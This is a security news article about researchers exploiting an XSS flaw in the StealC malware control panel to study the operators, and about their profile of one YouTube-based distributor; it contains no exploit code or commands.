Security researchers have uncovered a weakness inside the web control panel used by operators of the StealC malware, turning the attackers’ own infrastructure into an unexpected source of intelligence.
The flaw is a cross-site scripting (XSS) vulnerability that allowed researchers to observe activity inside the panel itself. By abusing the bug, analysts were able to collect system fingerprints, track live sessions, and even extract session cookies belonging to the malware operators.
The discovery came from researchers at CyberArk, who noted the irony of stealing cookies from a platform designed to steal cookies from victims.
What Is StealC?
StealC first appeared in early 2023 and is sold under a malware-as-a-service model. Customers can subscribe to the service and deploy the stealer using ready-made infrastructure. One of its most effective distribution techniques relies on YouTube, where attackers upload videos promoting pirated software. This approach, often called a “YouTube Ghost Network,” disguises malware as cracked versions of popular applications.
Over time, StealC has expanded its delivery methods. Researchers have seen it spread through tampered Blender-related files and social engineering campaigns such as FileFix. The malware itself has also evolved, gaining features like Telegram-based alerts, improved payload delivery, and a redesigned management interface known as StealC V2.
How the XSS Flaw Exposed the Attackers
Weeks after the updated control panel was released, its source code was leaked. That leak gave defenders a rare opportunity to study how the backend worked and ultimately identify the XSS vulnerability.
Rather than publicly sharing the exact exploit details, researchers chose to keep the technical specifics private to avoid helping the malware developers patch the issue or encouraging copycat criminal operations.
Using the flaw, analysts were able to gather surprisingly detailed information about at least one StealC customer, including approximate location data, hardware characteristics, and active authentication cookies from the operator’s own machine.
The Irony of Poor Cookie Security
XSS vulnerabilities occur when web applications fail to properly validate or encode user input, allowing malicious JavaScript to run in a visitor’s browser. This can lead to session hijacking, data theft, and account impersonation.
What stood out in this case was that the StealC panel lacked even basic cookie protections such as the httpOnly flag. This oversight made it possible for researchers to steal session cookies using a textbook XSS technique.
For a criminal operation built around mass cookie theft, the failure to protect its own cookies highlighted a serious lapse in operational security.
Profiling a StealC Operator
CyberArk also revealed details about a StealC customer known as “YouTubeTA,” short for YouTube Threat Actor. This individual heavily relied on YouTube to distribute StealC by promoting fake cracked versions of Adobe Photoshop and Adobe After Effects.
Researchers estimate that this campaign produced more than 5,000 stolen data logs, including hundreds of thousands of passwords and tens of millions of cookies. Most of the cookies were non-sensitive tracking cookies, but the scale of the operation was still significant.
Evidence suggests the actor used hijacked YouTube accounts to upload more malicious videos, creating a self-sustaining distribution loop. Additional findings point to the use of fake CAPTCHA-style lures, indicating that YouTube was not the only infection vector.
Operational Security Slip Reveals Location
Further analysis of the leaked panel showed that it supports multiple user roles, including administrators and standard users. In the case of YouTubeTA, the panel appeared to have a single admin account.
That account revealed clues about the operator’s environment, including language settings and hardware details pointing to an Apple M3-based system. In a critical mistake, the actor reportedly accessed the panel without using a VPN in mid-2025, briefly exposing a real IP address linked to a Ukrainian internet provider.
Based on the available data, researchers believe the individual is likely operating alone from Eastern Europe, in a region where Russian is commonly used.
A Broader Lesson About Malware-as-a-Service
The findings highlight a recurring theme in the malware economy. While MaaS platforms make it easier for criminals to scale attacks quickly, they also introduce risks similar to those faced by legitimate SaaS businesses.
Weak code quality, poor security practices, and rushed development can expose attackers to surveillance and identification.
Researchers say this case demonstrates how flaws in criminal infrastructure can be leveraged by defenders and law enforcement to gain insight into malware operations and, in some cases, unmask the people behind them.